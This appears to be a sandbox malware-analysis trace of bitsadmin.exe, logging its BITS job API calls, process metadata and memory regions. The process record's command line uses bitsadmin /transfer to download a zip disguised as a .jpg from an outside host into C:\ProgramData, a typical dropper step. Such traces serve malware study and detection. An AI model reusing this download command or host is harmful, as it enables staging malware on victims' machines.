[0067.599] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f048, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f048*=0xa) returned 1
[0067.599] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0067.599] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f038 | out: lpConsoleScreenBufferInfo=0x6f038) returned 1
[0067.600] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x6f050, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f050*=0x10) returned 1
[0067.600] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0067.600] _vsnwprintf (in: _Buffer=0x6ee64, _BufferCount=0xfe, _Format="%I64u Minutes", _ArgList=0x6ee1c | out: _Buffer="4 Minutes") returned 9
[0067.600] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f07c | out: lpConsoleScreenBufferInfo=0x6f07c) returned 1
[0067.600] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x6f094, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f094*=0x9) returned 1
[0067.601] CoTaskMemFree (pv=0x2083c0)
[0067.601] PeekMessageW (in: lpMsg=0x6f9f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6f9f0) returned 0
[0067.601] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x6fa18*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0068.209] PeekMessageW (in: lpMsg=0x6f9f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6f9f0) returned 1
[0068.209] TranslateMessage (lpMsg=0x6f9f0) returned 0
[0068.209] DispatchMessageW (lpMsg=0x6f9f0) returned 0x1
[0068.209] IBackgroundCopyCallback:JobModification (This=0x210cb0, pJob=0x1fa6b4, dwReserved=0x0) returned 0x0
[0068.209] IBackgroundCopyJob:GetState (in: This=0x1fa624, pVal=0x210cbc | out: pVal=0x210cbc) returned 0x0
[0068.210] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc3
[0068.210] IBackgroundCopyJob:GetType (in: This=0x1fa624, pVal=0x6f0b8 | out: pVal=0x6f0b8) returned 0x0
[0068.210] IBackgroundCopyJob:GetProgress (in: This=0x1fa624, pVal=0x210cc0 | out: pVal=0x210cc0) returned 0x0
[0068.211] IBackgroundCopyJob:GetPriority (in: This=0x1fa624, pVal=0x6f0b4 | out: pVal=0x6f0b4) returned 0x0
[0068.212] CoTaskMemFree (pv=0x0)
[0068.212] IBackgroundCopyJob:GetDisplayName (in: This=0x1fa624, pVal=0x6f0cc | out: pVal=0x6f0cc*="msd5") returned 0x0
[0068.212] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f074 | out: lpConsoleScreenBufferInfo=0x6f074) returned 1
[0068.213] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6f08c | out: lpNumberOfCharsWritten=0x6f08c) returned 1
[0068.213] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6f08c | out: lpNumberOfAttrsWritten=0x6f08c) returned 1
[0068.213] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0068.213] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.213] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f060 | out: lpConsoleScreenBufferInfo=0x6f060) returned 1
[0068.214] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f078, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f078*=0xa) returned 1
[0068.214] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.214] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f05c | out: lpConsoleScreenBufferInfo=0x6f05c) returned 1
[0068.214] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f074, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f074*=0x5) returned 1
[0068.214] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.214] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f064 | out: lpConsoleScreenBufferInfo=0x6f064) returned 1
[0068.215] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6f07c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f07c*=0x7) returned 1
[0068.215] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.215] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f058 | out: lpConsoleScreenBufferInfo=0x6f058) returned 1
[0068.215] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f070, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f070*=0x8) returned 1
[0068.215] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.215] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f060 | out: lpConsoleScreenBufferInfo=0x6f060) returned 1
[0068.216] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f078, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f078*=0x8) returned 1
[0068.216] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.216] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f054 | out: lpConsoleScreenBufferInfo=0x6f054) returned 1
[0068.216] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x6f06c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f06c*=0xe) returned 1
[0068.216] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.216] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f064 | out: lpConsoleScreenBufferInfo=0x6f064) returned 1
[0068.217] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f07c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f07c*=0xa) returned 1
[0068.217] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.217] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f04c | out: lpConsoleScreenBufferInfo=0x6f04c) returned 1
[0068.217] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f064, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f064*=0xa) returned 1
[0068.217] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.217] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f054 | out: lpConsoleScreenBufferInfo=0x6f054) returned 1
[0068.218] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f06c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f06c*=0x8) returned 1
[0068.218] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.218] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f078 | out: _Buffer="0") returned 1
[0068.218] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f084 | out: _Buffer="1") returned 1
[0068.218] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f054 | out: lpConsoleScreenBufferInfo=0x6f054) returned 1
[0068.218] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f06c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f06c*=0x5) returned 1
[0068.218] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.219] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f05c | out: lpConsoleScreenBufferInfo=0x6f05c) returned 1
[0068.219] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f074, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f074*=0x8) returned 1
[0068.219] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.219] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f080 | out: _Buffer="527856") returned 6
[0068.219] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f084 | out: _Buffer="937984") returned 6
[0068.219] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f080 | out: _Buffer="56") returned 2
[0068.219] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6f06c | out: lpSystemTimeAsFileTime=0x6f06c*(dwLowDateTime=0xd945be70, dwHighDateTime=0x1d469c7))
[0068.219] _finite (_X=0x942f5c42) returned 1
[0068.219] _finite (_X=0xa1626687) returned 1
[0068.219] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f02c | out: lpConsoleScreenBufferInfo=0x6f02c) returned 1
[0068.219] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x6f044, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f044*=0x17) returned 1
[0068.220] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.220] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f038 | out: lpConsoleScreenBufferInfo=0x6f038) returned 1
[0068.220] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x6f050, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f050*=0xf) returned 1
[0068.220] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.220] _vsnwprintf (in: _Buffer=0x6ee64, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x6ee28 | out: _Buffer="676.83 KB/S") returned 11
[0068.221] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f030 | out: lpConsoleScreenBufferInfo=0x6f030) returned 1
[0068.221] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x6f048, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f048*=0xc) returned 1
[0068.221] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.221] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f038 | out: lpConsoleScreenBufferInfo=0x6f038) returned 1
[0068.221] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x6f050, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f050*=0x10) returned 1
[0068.221] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.222] _vsnwprintf (in: _Buffer=0x6ee64, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x6ee1c | out: _Buffer="1 Seconds") returned 9
[0068.222] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f07c | out: lpConsoleScreenBufferInfo=0x6f07c) returned 1
[0068.222] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x6f094, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f094*=0x9) returned 1
[0068.222] CoTaskMemFree (pv=0x2083c0)
[0068.222] PeekMessageW (in: lpMsg=0x6f9f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6f9f0) returned 0
[0068.222] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x6fa18*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0068.566] PeekMessageW (in: lpMsg=0x6f9f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6f9f0) returned 1
[0068.566] TranslateMessage (lpMsg=0x6f9f0) returned 0
[0068.566] DispatchMessageW (lpMsg=0x6f9f0) returned 0x1
[0068.566] IBackgroundCopyCallback:JobTransferred (This=0x210cb0, pJob=0x1fa6b4) returned 0x0
[0068.566] KillTimer (hWnd=0x0, uIDEvent=0x7fc3) returned 1
[0068.566] IBackgroundCopyJob:GetState (in: This=0x1fa624, pVal=0x210cbc | out: pVal=0x210cbc) returned 0x0
[0068.567] IBackgroundCopyCallback:JobModification (This=0x210cb0, pJob=0x1fa6b4, dwReserved=0x0) returned 0x0
[0068.567] IBackgroundCopyJob:GetState (in: This=0x1fa624, pVal=0x210cbc | out: pVal=0x210cbc) returned 0x0
[0068.568] IBackgroundCopyJob:GetType (in: This=0x1fa624, pVal=0x6e028 | out: pVal=0x6e028) returned 0x0
[0068.568] IBackgroundCopyJob:GetProgress (in: This=0x1fa624, pVal=0x210cc0 | out: pVal=0x210cc0) returned 0x0
[0068.569] IBackgroundCopyJob:GetPriority (in: This=0x1fa624, pVal=0x6e024 | out: pVal=0x6e024) returned 0x0
[0068.570] CoTaskMemFree (pv=0x0)
[0068.570] IBackgroundCopyJob:GetDisplayName (in: This=0x1fa624, pVal=0x6e03c | out: pVal=0x6e03c*="msd5") returned 0x0
[0068.571] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfe4 | out: lpConsoleScreenBufferInfo=0x6dfe4) returned 1
[0068.571] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6dffc | out: lpNumberOfCharsWritten=0x6dffc) returned 1
[0068.571] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6dffc | out: lpNumberOfAttrsWritten=0x6dffc) returned 1
[0068.571] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0068.572] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.572] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfd0 | out: lpConsoleScreenBufferInfo=0x6dfd0) returned 1
[0068.572] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6dfe8, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfe8*=0xa) returned 1
[0068.572] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.572] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfcc | out: lpConsoleScreenBufferInfo=0x6dfcc) returned 1
[0068.573] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6dfe4, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfe4*=0x5) returned 1
[0068.573] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.573] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfd4 | out: lpConsoleScreenBufferInfo=0x6dfd4) returned 1
[0068.573] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6dfec, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfec*=0x7) returned 1
[0068.573] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.574] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfc8 | out: lpConsoleScreenBufferInfo=0x6dfc8) returned 1
[0068.574] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6dfe0, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfe0*=0x8) returned 1
[0068.574] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.574] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfd0 | out: lpConsoleScreenBufferInfo=0x6dfd0) returned 1
[0068.574] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6dfe8, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfe8*=0x8) returned 1
[0068.574] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.575] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfc4 | out: lpConsoleScreenBufferInfo=0x6dfc4) returned 1
[0068.575] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x6dfdc, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfdc*=0xd) returned 1
[0068.575] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.575] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfd4 | out: lpConsoleScreenBufferInfo=0x6dfd4) returned 1
[0068.575] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6dfec, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfec*=0xa) returned 1
[0068.576] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.576] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfbc | out: lpConsoleScreenBufferInfo=0x6dfbc) returned 1
[0068.576] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6dfd4, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfd4*=0xa) returned 1
[0068.576] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.576] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfc4 | out: lpConsoleScreenBufferInfo=0x6dfc4) returned 1
[0068.576] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6dfdc, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfdc*=0x8) returned 1
[0068.577] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.577] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6dfe8 | out: _Buffer="1") returned 1
[0068.577] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6dff4 | out: _Buffer="1") returned 1
[0068.577] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfc4 | out: lpConsoleScreenBufferInfo=0x6dfc4) returned 1
[0068.577] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6dfdc, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfdc*=0x5) returned 1
[0068.577] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.578] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfcc | out: lpConsoleScreenBufferInfo=0x6dfcc) returned 1
[0068.578] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6dfe4, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfe4*=0x8) returned 1
[0068.578] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.578] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6dff0 | out: _Buffer="937984") returned 6
[0068.578] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6dff4 | out: _Buffer="937984") returned 6
[0068.578] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6dff0 | out: _Buffer="100") returned 3
[0068.578] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfec | out: lpConsoleScreenBufferInfo=0x6dfec) returned 1
[0068.579] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x6e004, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e004*=0x16) returned 1
[0068.579] CoTaskMemFree (pv=0x2083c0)
[0068.579] IBackgroundCopyJob:Complete (This=0x1fa624) returned 0x0
[0068.585] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dff0 | out: lpConsoleScreenBufferInfo=0x6dff0) returned 1
[0068.586] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfc4 | out: lpConsoleScreenBufferInfo=0x6dfc4) returned 1
[0068.586] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6dfdc, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfdc*=0x2) returned 1
[0068.586] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6dfc4 | out: lpConsoleScreenBufferInfo=0x6dfc4) returned 1
[0068.586] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x6dfdc, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6dfdc*=0x14) returned 1
[0068.587] GetCurrentThreadId () returned 0xc0c
[0068.587] PostThreadMessageW (idThread=0xc0c, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0068.587] PeekMessageW (in: lpMsg=0x6f9f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6f9f0) returned 1
[0068.587] IUnknown:Release (This=0x1fa624) returned 0x1
[0068.587] IUnknown:Release (This=0x1fa54c) returned 0x0
[0068.588] CoUninitialize ()
[0068.588] IUnknown:Release (This=0x210cb0) returned 0x2
[0068.588] IUnknown:Release (This=0x210cb0) returned 0x1
[0068.588] IUnknown:Release (This=0x210cb0) returned 0x0
[0068.588] IUnknown:Release (This=0x1fa624) returned 0x1
[0068.588] CoTaskMemFree (pv=0x210cb0)
[0068.592] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0068.592] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0068.592] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.592] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0068.592] CloseHandle (hObject=0x80) returned 1
[0068.592] exit (_Code=0)
Thread:
id = 136
os_tid = 0xc20
Thread:
id = 137
os_tid = 0xc24
Thread:
id = 138
os_tid = 0xc28
Thread:
id = 139
os_tid = 0xc2c
Process:
id = "12"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be220"
os_pid = "0xc38"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhme.jpg.zip?231938807 C:\\ProgramData\\tempa\\marxvxinhhme.jpg"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1423
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1424
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1425
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1426
start_va = 0x50000
end_va = 0x8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1427
start_va = 0x7e0000
end_va = 0x823fff
entry_point = 0x7e0000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1428
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1429
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1430
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
